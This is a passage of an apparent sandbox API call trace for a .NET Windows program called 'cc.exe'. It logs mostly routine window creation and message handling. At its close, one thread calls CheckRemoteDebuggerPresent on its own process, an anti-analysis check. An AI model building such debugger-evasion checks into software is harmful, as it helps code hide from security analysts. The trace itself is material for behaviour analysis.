dwStyle=0x22010000, X=-2147483648, Y=-2147483648, nWidth=300, nHeight=300, hWndParent=0x0, hMenu=0x0, hInstance=0x13d0000, lpParam=0x0) returned 0xf009e [0073.651] SetWindowLongW (hWnd=0xf009e, nIndex=-4, dwNewLong=2005870045) returned 83364758 [0073.652] GetWindowLongW (hWnd=0xf009e, nIndex=-4) returned 2005870045 [0073.652] SetWindowLongW (hWnd=0xf009e, nIndex=-4, dwNewLong=83364878) returned 2005870045 [0073.652] GetWindowLongW (hWnd=0xf009e, nIndex=-4) returned 83364878 [0073.652] GetWindowLongW (hWnd=0xf009e, nIndex=-16) returned 650182656 [0073.653] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0xf009e, Msg=0x81, wParam=0x0, lParam=0x36ea14) returned 0x1 [0073.656] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0xf009e, Msg=0x83, wParam=0x0, lParam=0x36ea00) returned 0x0 [0073.891] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0xf009e, Msg=0x1, wParam=0x0, lParam=0x36ea14) returned 0x0 [0073.891] GetClientRect (in: hWnd=0xf009e, lpRect=0x36e74c | out: lpRect=0x36e74c) returned 1 [0073.891] GetWindowRect (in: hWnd=0xf009e, lpRect=0x36e74c | out: lpRect=0x36e74c) returned 1 [0073.892] GetWindowTextLengthW (hWnd=0xf009e) returned 0 [0073.892] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0xf009e, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x0 [0073.892] GetSystemMetrics (nIndex=42) returned 0 [0073.893] GetWindowTextW (in: hWnd=0xf009e, lpString=0x36e5c4, nMaxCount=1 | out: lpString="") returned 0 [0073.893] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0xf009e, Msg=0xd, wParam=0x1, lParam=0x36e5c4) returned 0x0 [0073.902] GetProcessWindowStation () returned 0x60 [0073.903] GetUserObjectInformationA (in: hObj=0x60, nIndex=1, pvInfo=0x28f68c8, nLength=0xc, lpnLengthNeeded=0x36e644 | out: pvInfo=0x28f68c8, lpnLengthNeeded=0x36e644) returned 1 [0073.905] SetConsoleCtrlHandler (HandlerRoutine=0x4f80c36, Add=1) returned 1 [0073.905] GetModuleHandleW (lpModuleName=0x0) returned 0x13d0000 [0073.906] GetModuleHandleW (lpModuleName=0x0) returned 0x13d0000 [0073.908] GetClassInfoW (in: hInstance=0x13d0000, lpClassName=".NET-BroadcastEventWindow.4.0.0.0.34f5582.0", lpWndClass=0x28f692c | out: lpWndClass=0x28f692c) returned 0 [0073.910] CoTaskMemAlloc (cb=0x58) returned 0x43a028 [0073.910] RegisterClassW (lpWndClass=0x36e594) returned 0xc107 [0073.910] CoTaskMemFree (pv=0x43a028) [0073.911] CreateWindowExW (dwExStyle=0x0, lpClassName=".NET-BroadcastEventWindow.4.0.0.0.34f5582.0", lpWindowName=".NET-BroadcastEventWindow.4.0.0.0.34f5582.0", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x13d0000, lpParam=0x0) returned 0x6001e [0073.911] NtdllDefWindowProc_W () returned 0x1 [0073.911] NtdllDefWindowProc_W () returned 0x0 [0073.912] NtdllDefWindowProc_W () returned 0x0 [0073.912] NtdllDefWindowProc_W () returned 0x0 [0073.912] NtdllDefWindowProc_W () returned 0x0 [0073.949] GetStartupInfoW (in: lpStartupInfo=0x28f6cc8 | out: lpStartupInfo=0x28f6cc8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\Desktop\\cc.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0073.950] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0xf009e, Msg=0x46, wParam=0x0, lParam=0x36ea28) returned 0x0 [0073.950] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0xf009e, Msg=0x83, wParam=0x1, lParam=0x36ea00) returned 0x0 [0073.951] GetWindowPlacement (in: hWnd=0xf009e, lpwndpl=0x36e7d8 | out: lpwndpl=0x36e7d8) returned 1 [0073.951] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0xf009e, Msg=0x47, wParam=0x0, lParam=0x36ea28) returned 0x0 [0073.951] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0xf009e, Msg=0x3, wParam=0x0, lParam=0x83008300) returned 0x0 [0073.951] GetClientRect (in: hWnd=0xf009e, lpRect=0x36e2ec | out: lpRect=0x36e2ec) returned 1 [0073.952] GetWindowRect (in: hWnd=0xf009e, lpRect=0x36e2ec | out: lpRect=0x36e2ec) returned 1 [0073.952] GetWindowTextLengthW (hWnd=0xf009e) returned 0 [0073.952] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0xf009e, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x0 [0073.952] GetSystemMetrics (nIndex=42) returned 0 [0073.952] GetWindowTextW (in: hWnd=0xf009e, lpString=0x36e164, nMaxCount=1 | out: lpString="") returned 0 [0073.952] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0xf009e, Msg=0xd, wParam=0x1, lParam=0x36e164) returned 0x0 [0073.952] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0xf009e, Msg=0x5, wParam=0x1, lParam=0x0) returned 0x0 [0074.037] GetClientRect (in: hWnd=0xf009e, lpRect=0x36e788 | out: lpRect=0x36e788) returned 1 [0074.037] GetWindowRect (in: hWnd=0xf009e, lpRect=0x36e788 | out: lpRect=0x36e788) returned 1 [0074.037] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0xf009e, Msg=0xd, wParam=0x104, lParam=0xccc5e0) returned 0x0 [0074.039] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0xf009e, Msg=0x83, wParam=0x1, lParam=0x36e60c) returned 0x0 [0074.040] GetParent (hWnd=0xf009e) returned 0x0 [0074.087] GetStockObject (i=5) returned 0x1900015 [0074.088] GetModuleHandleW (lpModuleName=0x0) returned 0x13d0000 [0074.088] CoTaskMemAlloc (cb=0x5c) returned 0x443580 [0074.088] RegisterClassW (lpWndClass=0x36ee5c) returned 0xc1bd [0074.088] CoTaskMemFree (pv=0x443580) [0074.089] GetModuleHandleW (lpModuleName=0x0) returned 0x13d0000 [0074.089] CreateWindowExW (dwExStyle=0x80, lpClassName="WindowsForms10.Window.0.app.0.34f5582_r14_ad1", lpWindowName=0x0, dwStyle=0x0, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x13d0000, lpParam=0x0) returned 0x4010e [0074.089] SetWindowLongW (hWnd=0x4010e, nIndex=-4, dwNewLong=2005870045) returned 83364998 [0074.089] GetWindowLongW (hWnd=0x4010e, nIndex=-4) returned 2005870045 [0074.089] SetWindowLongW (hWnd=0x4010e, nIndex=-4, dwNewLong=83365038) returned 2005870045 [0074.089] GetWindowLongW (hWnd=0x4010e, nIndex=-4) returned 83365038 [0074.089] GetWindowLongW (hWnd=0x4010e, nIndex=-16) returned 79691776 [0074.134] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0x4010e, Msg=0x24, wParam=0x0, lParam=0x36ea48) returned 0x0 [0074.134] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0x4010e, Msg=0x81, wParam=0x0, lParam=0x36ea3c) returned 0x1 [0074.134] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0x4010e, Msg=0x83, wParam=0x0, lParam=0x36ea28) returned 0x0 [0074.135] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0x4010e, Msg=0x1, wParam=0x0, lParam=0x36ea3c) returned 0x0 [0074.135] SetWindowLongW (hWnd=0xf009e, nIndex=-8, dwNewLong=262414) returned 0 [0074.383] GetSystemMetrics (nIndex=11) returned 32 [0074.383] GetSystemMetrics (nIndex=12) returned 32 [0074.384] GetDC (hWnd=0x0) returned 0xc0101ea [0074.397] GetDeviceCaps (hdc=0xc0101ea, index=12) returned 32 [0074.397] GetDeviceCaps (hdc=0xc0101ea, index=14) returned 1 [0074.397] ReleaseDC (hWnd=0x0, hDC=0xc0101ea) returned 1 [0074.429] CreateIconFromResourceEx (presbits=0x28f9f88, dwResSize=0x10a8, fIcon=1, dwVer=0x30000, cxDesired=0, cyDesired=0, Flags=0x0) returned 0xa00cb [0074.431] GetSystemMetrics (nIndex=49) returned 16 [0074.431] GetSystemMetrics (nIndex=50) returned 16 [0074.431] CreateIconFromResourceEx (presbits=0x28fb06c, dwResSize=0x468, fIcon=1, dwVer=0x30000, cxDesired=0, cyDesired=0, Flags=0x0) returned 0x1000fb [0074.432] SendMessageW (hWnd=0xf009e, Msg=0x80, wParam=0x0, lParam=0x1000fb) returned 0x0 [0074.432] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0xf009e, Msg=0x80, wParam=0x0, lParam=0x1000fb) returned 0x0 [0074.433] SendMessageW (hWnd=0xf009e, Msg=0x80, wParam=0x1, lParam=0xa00cb) returned 0x0 [0074.433] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0xf009e, Msg=0x80, wParam=0x1, lParam=0xa00cb) returned 0x0 [0074.433] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0xf009e, Msg=0xd, wParam=0x104, lParam=0xccc5e0) returned 0x0 [0074.434] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0xf009e, Msg=0xd, wParam=0x104, lParam=0xccc5e0) returned 0x0 [0074.434] GetSystemMenu (hWnd=0xf009e, bRevert=0) returned 0x0 [0074.434] GetWindowPlacement (in: hWnd=0xf009e, lpwndpl=0x36ef9c | out: lpwndpl=0x36ef9c) returned 1 [0074.434] EnableMenuItem (hMenu=0x0, uIDEnableItem=0xf020, uEnable=0x1) returned 1 [0074.435] EnableMenuItem (hMenu=0x0, uIDEnableItem=0xf030, uEnable=0x0) returned 1 [0074.435] EnableMenuItem (hMenu=0x0, uIDEnableItem=0xf060, uEnable=0x0) returned 1 [0074.435] EnableMenuItem (hMenu=0x0, uIDEnableItem=0xf120, uEnable=0x0) returned 1 [0074.435] EnableMenuItem (hMenu=0x0, uIDEnableItem=0xf000, uEnable=0x1) returned 1 [0074.435] SetWindowLongW (hWnd=0xf009e, nIndex=-8, dwNewLong=262414) returned 262414 [0074.435] SendMessageW (hWnd=0x4010e, Msg=0x80, wParam=0x1, lParam=0xa00cb) returned 0x0 [0074.435] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0x4010e, Msg=0x80, wParam=0x1, lParam=0xa00cb) returned 0x0 [0074.436] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0x4010e, Msg=0xd, wParam=0x104, lParam=0xccc5e0) returned 0x0 [0074.437] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0x4010e, Msg=0xd, wParam=0x104, lParam=0xccc5e0) returned 0x0 [0074.437] GetWindowLongW (hWnd=0xf009e, nIndex=-16) returned 650182656 [0074.437] GetWindowLongW (hWnd=0xf009e, nIndex=-16) returned 650182656 [0074.437] GetWindowLongW (hWnd=0xf009e, nIndex=-20) returned 65792 [0074.437] SetWindowLongW (hWnd=0xf009e, nIndex=-16, dwNewLong=570490880) returned 650182656 [0074.437] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0xf009e, Msg=0x7c, wParam=0xfffffff0, lParam=0x36ef34) returned 0x0 [0074.437] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0xf009e, Msg=0x7d, wParam=0xfffffff0, lParam=0x36ef34) returned 0x0 [0074.438] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0xf009e, Msg=0x46, wParam=0x0, lParam=0x36e8b4) returned 0x0 [0074.438] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0xf009e, Msg=0x83, wParam=0x1, lParam=0x36e88c) returned 0x0 [0074.438] GetWindowPlacement (in: hWnd=0xf009e, lpwndpl=0x36e664 | out: lpwndpl=0x36e664) returned 1 [0074.438] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0xf009e, Msg=0x47, wParam=0x0, lParam=0x36e8b4) returned 0x0 [0074.438] GetClientRect (in: hWnd=0xf009e, lpRect=0x36e614 | out: lpRect=0x36e614) returned 1 [0074.438] GetWindowRect (in: hWnd=0xf009e, lpRect=0x36e614 | out: lpRect=0x36e614) returned 1 [0074.439] SetWindowLongW (hWnd=0xf009e, nIndex=-20, dwNewLong=65536) returned 65536 [0074.439] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0xf009e, Msg=0x7c, wParam=0xffffffec, lParam=0x36ef34) returned 0x0 [0074.439] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0xf009e, Msg=0x7d, wParam=0xffffffec, lParam=0x36ef34) returned 0x0 [0074.440] SetWindowPos (hWnd=0xf009e, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x37) returned 1 [0074.440] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0xf009e, Msg=0x46, wParam=0x0, lParam=0x36ef54) returned 0x0 [0074.440] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0xf009e, Msg=0x83, wParam=0x1, lParam=0x36ef2c) returned 0x0 [0076.749] GetWindowPlacement (in: hWnd=0xf009e, lpwndpl=0x36ed04 | out: lpwndpl=0x36ed04) returned 1 [0076.749] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0xf009e, Msg=0x47, wParam=0x0, lParam=0x36ef54) returned 0x0 [0076.749] GetClientRect (in: hWnd=0xf009e, lpRect=0x36ecb4 | out: lpRect=0x36ecb4) returned 1 [0076.749] GetWindowRect (in: hWnd=0xf009e, lpRect=0x36ecb4 | out: lpRect=0x36ecb4) returned 1 [0076.750] RedrawWindow (hWnd=0xf009e, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x85) returned 1 [0076.750] GetSystemMenu (hWnd=0xf009e, bRevert=0) returned 0x0 [0076.750] GetWindowPlacement (in: hWnd=0xf009e, lpwndpl=0x36ef8c | out: lpwndpl=0x36ef8c) returned 1 [0076.750] EnableMenuItem (hMenu=0x0, uIDEnableItem=0xf020, uEnable=0x1) returned 1 [0076.750] EnableMenuItem (hMenu=0x0, uIDEnableItem=0xf030, uEnable=0x0) returned 1 [0076.750] EnableMenuItem (hMenu=0x0, uIDEnableItem=0xf060, uEnable=0x0) returned 1 [0076.750] EnableMenuItem (hMenu=0x0, uIDEnableItem=0xf120, uEnable=0x0) returned 1 [0076.750] EnableMenuItem (hMenu=0x0, uIDEnableItem=0xf000, uEnable=0x1) returned 1 [0076.750] ShowWindow (hWnd=0xf009e, nCmdShow=2) returned 0 [0076.750] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0xf009e, Msg=0x46, wParam=0x0, lParam=0x36f000) returned 0x0 [0076.751] GetWindowPlacement (in: hWnd=0xf009e, lpwndpl=0x36edb0 | out: lpwndpl=0x36edb0) returned 1 [0076.751] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0xf009e, Msg=0x47, wParam=0x0, lParam=0x36f000) returned 0x0 [0076.752] GetClientRect (in: hWnd=0xf009e, lpRect=0x36ed60 | out: lpRect=0x36ed60) returned 1 [0076.752] GetWindowRect (in: hWnd=0xf009e, lpRect=0x36ed60 | out: lpRect=0x36ed60) returned 1 [0076.752] GetWindowTextLengthW (hWnd=0xf009e) returned 0 [0076.752] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0xf009e, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x0 [0076.752] GetSystemMetrics (nIndex=42) returned 0 [0076.752] GetWindowTextW (in: hWnd=0xf009e, lpString=0x36eefc, nMaxCount=1 | out: lpString="") returned 0 [0076.752] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0xf009e, Msg=0xd, wParam=0x1, lParam=0x36eefc) returned 0x0 [0076.752] SendMessageW (hWnd=0xf009e, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0076.752] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0xf009e, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0076.753] GetWindowThreadProcessId (in: hWnd=0xf009e, lpdwProcessId=0x36ed68 | out: lpdwProcessId=0x36ed68) returned 0xf68 [0076.753] GetCurrentThreadId () returned 0xf68 [0076.754] RegisterClipboardFormatW (lpszFormat="WindowsForms12_ThreadCallbackMessage") returned 0xc1be [0076.754] PostMessageW (hWnd=0xf009e, Msg=0xc1be, wParam=0x0, lParam=0x0) returned 1 [0077.067] OleInitialize (pvReserved=0x0) returned 0x0 [0077.068] CoRegisterMessageFilter (in: lpMessageFilter=0x0, lplpMessageFilter=0x36f11c | out: lplpMessageFilter=0x36f11c*=0x0) returned 0x0 [0077.070] PeekMessageW (in: lpMsg=0x36f0f0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x36f0f0) returned 1 [0077.071] IsWindowUnicode (hWnd=0xf009e) returned 1 [0077.071] GetMessageW (in: lpMsg=0x36f0f0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x36f0f0) returned 1 [0077.072] TranslateMessage (lpMsg=0x36f0f0) returned 0 [0077.073] DispatchMessageW (lpMsg=0x36f0f0) returned 0x0 [0077.074] PeekMessageW (in: lpMsg=0x36f0f0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x36f0f0) returned 0 [0077.075] PeekMessageW (in: lpMsg=0x36f0f0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x36f0f0) returned 0 [0077.075] WaitMessage () returned 1 [0189.834] PeekMessageW (in: lpMsg=0x36f0f0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x36f0f0) returned 0 [0189.835] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0xf009e, Msg=0x46, wParam=0x0, lParam=0x36efd8) returned 0x0 [0189.836] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0x4010e, Msg=0x46, wParam=0x0, lParam=0x36efd8) returned 0x0 [0189.836] GetWindowPlacement (in: hWnd=0xf009e, lpwndpl=0x36ed88 | out: lpwndpl=0x36ed88) returned 1 [0189.837] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0xf009e, Msg=0x47, wParam=0x0, lParam=0x36efd8) returned 0x0 [0189.837] GetClientRect (in: hWnd=0xf009e, lpRect=0x36ed38 | out: lpRect=0x36ed38) returned 1 [0189.837] GetWindowRect (in: hWnd=0xf009e, lpRect=0x36ed38 | out: lpRect=0x36ed38) returned 1 [0189.837] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0x4010e, Msg=0x47, wParam=0x0, lParam=0x36efd8) returned 0x0 [0189.837] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0x4010e, Msg=0xd, wParam=0x104, lParam=0xccc5e0) returned 0x0 [0189.838] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0x4010e, Msg=0x83, wParam=0x1, lParam=0x36ebbc) returned 0x0 [0189.839] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0xf009e, Msg=0x1c, wParam=0x1, lParam=0x4cc) returned 0x0 [0189.839] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0x4010e, Msg=0x1c, wParam=0x1, lParam=0x4cc) returned 0x0 [0189.839] NtdllDefWindowProc_W () returned 0x0 [0189.839] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0xf009e, Msg=0x86, wParam=0x200001, lParam=0x0) returned 0x1 [0189.839] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0xf009e, Msg=0xd, wParam=0xff, lParam=0x36da44) returned 0x0 [0189.844] SetFocus (hWnd=0xf009e) returned 0x0 [0189.844] PeekMessageW (in: lpMsg=0x36f0f0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x36f0f0) returned 0 [0189.844] WaitMessage () returned 1 [0191.101] PeekMessageW (in: lpMsg=0x36f0f0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x36f0f0) returned 0 [0191.102] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0xf009e, Msg=0x86, wParam=0x0, lParam=0x0) returned 0x1 [0191.102] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0xf009e, Msg=0xd, wParam=0xff, lParam=0x36da44) returned 0x0 [0191.103] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0xf009e, Msg=0x1c, wParam=0x0, lParam=0x3a4) returned 0x0 [0191.103] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0x4010e, Msg=0x1c, wParam=0x0, lParam=0x3a4) returned 0x0 [0191.103] NtdllDefWindowProc_W () returned 0x0 [0191.104] PeekMessageW (in: lpMsg=0x36f0f0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x36f0f0) returned 0 [0191.104] WaitMessage () returned 1 [0191.257] PeekMessageW (in: lpMsg=0x36f0f0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x36f0f0) returned 0 [0191.258] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0xf009e, Msg=0x46, wParam=0x0, lParam=0x36efd8) returned 0x0 [0191.258] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0x4010e, Msg=0x46, wParam=0x0, lParam=0x36efd8) returned 0x0 [0191.258] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0xf009e, Msg=0x1c, wParam=0x1, lParam=0xf68) returned 0x0 [0191.258] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0x4010e, Msg=0x1c, wParam=0x1, lParam=0xf68) returned 0x0 [0191.258] NtdllDefWindowProc_W () returned 0x0 [0191.258] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0xf009e, Msg=0x86, wParam=0x200001, lParam=0x0) returned 0x1 [0191.258] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0xf009e, Msg=0xd, wParam=0xff, lParam=0x36da44) returned 0x0 [0191.258] SetFocus (hWnd=0xf009e) returned 0x0 [0191.259] PeekMessageW (in: lpMsg=0x36f0f0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x36f0f0) returned 0 [0191.259] WaitMessage () returned 1 [0191.499] PeekMessageW (lpMsg=0x36f0f0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0) [0191.499] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0x4010e, Msg=0x3b, wParam=0x50e, lParam=0x0) returned 0x1 [0191.540] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0x4010e, Msg=0x11, wParam=0x0, lParam=0x0) returned 0x1 [0191.579] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0xf009e, Msg=0x86, wParam=0x200000, lParam=0x4010e) returned 0x1 [0191.579] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0xf009e, Msg=0xd, wParam=0xff, lParam=0x36da44) returned 0x0 [0191.580] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0xf009e, Msg=0x46, wParam=0x0, lParam=0x36efd8) returned 0x0 [0191.580] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0x4010e, Msg=0x46, wParam=0x0, lParam=0x36efd8) returned 0x0 [0191.580] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0x4010e, Msg=0x86, wParam=0x1, lParam=0xf009e) returned 0x1 [0191.580] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0x4010e, Msg=0xd, wParam=0x104, lParam=0xccc5e0) returned 0x0 [0191.581] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0x4010e, Msg=0xd, wParam=0x104, lParam=0xccc5e0) returned 0x0 [0191.581] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0x4010e, Msg=0x6, wParam=0x1, lParam=0xf009e) returned 0x0 [0191.588] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0x4010e, Msg=0x281, wParam=0x1, lParam=0xc000000f) returned 0x0 [0191.590] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0x4010e, Msg=0x282, wParam=0x2, lParam=0x0) returned 0x0 [0191.591] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0x4010e, Msg=0x7, wParam=0x0, lParam=0x0) returned 0x0 [0191.591] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0x4010e, Msg=0x3b, wParam=0x50c, lParam=0x0) [0191.620] DestroyCursor (hCursor=0x1000fb) returned 1 [0191.726] GetWindowLongW (hWnd=0xf009e, nIndex=-20) returned 65536 [0191.726] DestroyWindow (hWnd=0xf009e) [0191.726] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0xf009e, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0191.727] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0xf009e, Msg=0x46, wParam=0x0, lParam=0x36e7a4) returned 0x0 [0191.727] GetWindowPlacement (in: hWnd=0xf009e, lpwndpl=0x36e554 | out: lpwndpl=0x36e554) returned 1 [0191.727] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0xf009e, Msg=0x47, wParam=0x0, lParam=0x36e7a4) returned 0x0 [0191.727] GetClientRect (in: hWnd=0xf009e, lpRect=0x36e504 | out: lpRect=0x36e504) returned 1 [0191.727] GetWindowRect (in: hWnd=0xf009e, lpRect=0x36e504 | out: lpRect=0x36e504) returned 1 [0191.994] PostThreadMessageW (idThread=0xf68, Msg=0x12, wParam=0x0, lParam=0x0) returned 1 [0192.091] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0xf009e, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0192.091] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0xf009e, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0192.091] DestroyWindow (hWnd=0x4010e) [0192.091] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0x4010e, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0192.092] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0x4010e, Msg=0x86, wParam=0x0, lParam=0x0) returned 0x1 [0192.092] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0x4010e, Msg=0xd, wParam=0x104, lParam=0xccc5e0) returned 0x0 [0192.092] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0x4010e, Msg=0xd, wParam=0x104, lParam=0xccc610) returned 0x0 [0192.092] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0x4010e, Msg=0x6, wParam=0x0, lParam=0x0) returned 0x0 [0192.092] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0x4010e, Msg=0x1c, wParam=0x0, lParam=0xb60) returned 0x0 [0192.093] NtdllDefWindowProc_W () returned 0x0 [0192.093] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0x4010e, Msg=0x8, wParam=0x0, lParam=0x0) returned 0x0 [0192.093] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0x4010e, Msg=0x281, wParam=0x0, lParam=0xc000000f) returned 0x0 [0192.093] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0x4010e, Msg=0x282, wParam=0x1, lParam=0x0) returned 0x0 [0192.093] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0x4010e, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0192.093] CallWindowProcW (lpPrevWndFunc=0x778f25dd, hWnd=0x4010e, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 Thread: id = 2 os_tid = 0xf78 Thread: id = 3 os_tid = 0xf7c [0056.984] CoGetContextToken (in: pToken=0x10dfa5c | out: pToken=0x10dfa5c) returned 0x800401f0 [0056.984] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 Thread: id = 4 os_tid = 0xf80 Thread: id = 5 os_tid = 0xf8c [0062.053] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0062.620] GetCurrentProcessId () returned 0xf64 [0062.620] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf64) returned 0x224 [0062.620] GetExitCodeProcess (in: hProcess=0x224, lpExitCode=0x2896d54 | out: lpExitCode=0x2896d54*=0x103) returned 1 [0062.620] CheckRemoteDebuggerPresent (in: hProcess=0x224, pbDebuggerPresent=0x516f848 | out: pbDebuggerPresent=0x516f848) returned 1 [0062.620] 